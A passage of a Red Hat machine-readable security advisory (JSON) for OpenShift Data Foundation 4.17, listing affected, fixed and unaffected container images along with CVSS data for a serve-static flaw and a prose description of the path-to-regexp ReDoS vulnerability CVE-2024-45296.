"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
